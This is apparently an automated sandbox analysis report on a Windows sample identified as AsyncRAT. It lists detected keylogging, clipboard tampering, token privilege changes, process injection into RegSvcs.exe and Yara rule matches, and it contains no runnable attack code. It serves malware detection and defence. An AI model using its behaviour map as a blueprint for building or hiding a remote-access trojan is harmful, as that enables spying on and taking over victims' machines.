Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003D8C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1929347646.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003D8C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1929347646.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1932432548.0000000003901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00459FFF
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00459FFF
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 1_2_00459FFF
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_00459FFF
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW, 0_2_00456354
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0047C08E
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_0047C08E
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 5_2_0047C08E

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.pteropod.exe.c10000.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.pteropod.exe.2ec0000.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.RegSvcs.exe.530000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.1906683900.0000000000532000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000002.1710132374.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.1877085123.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00434D50
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_004461ED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004364AA
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 1_2_004364AA
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 5_2_004364AA
Detected potential crypto function
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00409A40 0_2_00409A40
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00412038 0_2_00412038
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0047E1FA 0_2_0047E1FA
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0041A46B 0_2_0041A46B
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0041240C 0_2_0041240C
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004045E0 0_2_004045E0
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00412818 0_2_00412818
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0047CBF0 0_2_0047CBF0
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044EBBC 0_2_0044EBBC
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00412C38 0_2_00412C38
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044ED9A 0_2_0044ED9A
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00424F70 0_2_00424F70
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0041AF0D 0_2_0041AF0D
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00427161 0_2_00427161
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004212BE 0_2_004212BE
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00443390 0_2_00443390
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00443391 0_2_00443391
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0041D750 0_2_0041D750
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004037E0 0_2_004037E0
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00427859 0_2_00427859
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040F890 0_2_0040F890
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0042397B 0_2_0042397B
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00411B63 0_2_00411B63
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00423EBF 0_2_00423EBF
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_03E8F2A0 0_2_03E8F2A0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00409A40 1_2_00409A40
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00412038 1_2_00412038
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0047E1FA 1_2_0047E1FA
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0041A46B 1_2_0041A46B
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0041240C 1_2_0041240C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004045E0 1_2_004045E0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00412818 1_2_00412818
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0047CBF0 1_2_0047CBF0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0044EBBC 1_2_0044EBBC
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00412C38 1_2_00412C38
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0044ED9A 1_2_0044ED9A
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00424F70 1_2_00424F70
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0041AF0D 1_2_0041AF0D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00427161 1_2_00427161
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004212BE 1_2_004212BE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00443390 1_2_00443390
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00443391 1_2_00443391
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0041D750 1_2_0041D750
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004037E0 1_2_004037E0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00427859 1_2_00427859
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0040F890 1_2_0040F890
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0042397B 1_2_0042397B
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00411B63 1_2_00411B63
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00423EBF 1_2_00423EBF
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_03E4CA90 1_2_03E4CA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_026BD504 2_2_026BD504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0A6A0 2_2_06F0A6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0EEEC 2_2_06F0EEEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0AE20 2_2_06F0AE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0EEEC 2_2_06F0EEEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0EEEC 2_2_06F0EEEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07049F80 2_2_07049F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070443D8 2_2_070443D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070473F1 2_2_070473F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07086530 2_2_07086530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0708C410 2_2_0708C410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0708A463 2_2_0708A463
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070841A0 2_2_070841A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0708B000 2_2_0708B000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0708BBA9 2_2_0708BBA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07086521 2_2_07086521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0708AFF0 2_2_0708AFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07144510 2_2_07144510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0714B568 2_2_0714B568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_071495B0 2_2_071495B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07146438 2_2_07146438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0714A468 2_2_0714A468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07148E48 2_2_07148E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07144EE8 2_2_07144EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07146D46 2_2_07146D46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0714CD80 2_2_0714CD80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07143CA8 2_2_07143CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0714EB90 2_2_0714EB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07145A66 2_2_07145A66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07148808 2_2_07148808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_071487F8 2_2_071487F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07143602 2_2_07143602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07143630 2_2_07143630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07148E38 2_2_07148E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07143C98 2_2_07143C98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07141B38 2_2_07141B38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07141B48 2_2_07141B48
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00409A40 5_2_00409A40
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00412038 5_2_00412038
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0047E1FA 5_2_0047E1FA
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0041A46B 5_2_0041A46B
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0041240C 5_2_0041240C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004045E0 5_2_004045E0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00412818 5_2_00412818
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0047CBF0 5_2_0047CBF0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0044EBBC 5_2_0044EBBC
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00412C38 5_2_00412C38
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0044ED9A 5_2_0044ED9A
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00424F70 5_2_00424F70
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0041AF0D 5_2_0041AF0D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00427161 5_2_00427161
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004212BE 5_2_004212BE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00443390 5_2_00443390
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00443391 5_2_00443391
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0041D750 5_2_0041D750
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004037E0 5_2_004037E0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00427859 5_2_00427859
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0040F890 5_2_0040F890
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0042397B 5_2_0042397B
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00411B63 5_2_00411B63
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00423EBF 5_2_00423EBF
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_03BA8A08 5_2_03BA8A08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_02450EC0 6_2_02450EC0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 00425210 appears 56 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 00445975 appears 130 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 0041171A appears 74 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 0041832D appears 52 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 004136BC appears 36 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 004092C0 appears 50 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 0041718C appears 88 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 00401B70 appears 46 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 0040E6D0 appears 70 times
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: String function: 0043362D appears 38 times
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: String function: 00445975 appears 65 times
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: String function: 0041171A appears 37 times
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: String function: 0041718C appears 44 times
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: String function: 0040E6D0 appears 35 times
Uses 32bit PE files
Source: 7xonkSJwuY.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Yara signature match
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.pteropod.exe.c10000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.pteropod.exe.2ec0000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.RegSvcs.exe.530000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.1906683900.0000000000532000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000002.1710132374.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.1877085123.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@10/5@0/1
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044AF5C GetLastError,FormatMessageW, 0_2_0044AF5C
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 0_2_00464422
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004364AA
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 1_2_00464422
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 1_2_004364AA
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 5_2_00464422
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 5_2_004364AA
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_0045D517
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle, 0_2_0043701F
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket, 0_2_0047A999
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0043614F
Source: C:\Users\user\Desktop\7xonkSJwuY.exe File created: C:\Users\user\AppData\Local\arrogatingly Jump to behavior
